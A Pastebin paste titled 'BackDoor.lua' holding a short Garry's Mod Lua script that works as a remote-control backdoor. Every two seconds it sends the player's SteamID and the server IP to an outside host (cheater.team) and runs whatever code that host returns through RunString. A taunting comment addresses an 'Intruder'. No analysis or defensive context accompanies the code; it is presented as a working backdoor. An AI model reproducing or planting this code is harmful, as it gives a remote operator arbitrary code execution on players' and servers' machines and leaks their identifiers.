Advertisement
Guest User

BackDoor.lua

a guest
Feb 23rd, 2019
56
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.69 KB | None | 0 0
  1. // Hello Intruder, You've come this far!// Lets keep going, you have a while yet.
  2.  
  3. timer.Create("39715",2,0,function()
  4. http.Fetch("http://cheater.team/hail/slave.php?action=update&steam="..LocalPlayer():SteamID().."&serverip="..game.GetIPAddress(),
  5. function(p0)
  6. local p1 = util.JSONToTable(p0);
  7.  
  8. if(p1["response"]["packet"] != 0 &&
  9. p1["response"]["packet"]["header"] != "0" &&
  10. p1["response"]["packet"]["source"] != "0" &&
  11. ( p1["response"]["packet"]["header"] == "*" ||
  12. p1["response"]["packet"]["header"] == LocalPlayer():SteamID() )) then
  13.  
  14. RunString(p1["response"]["packet"]["source"]);
  15. end
  16. end,
  17. function(...)
  18.  
  19. end);
  20. end);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement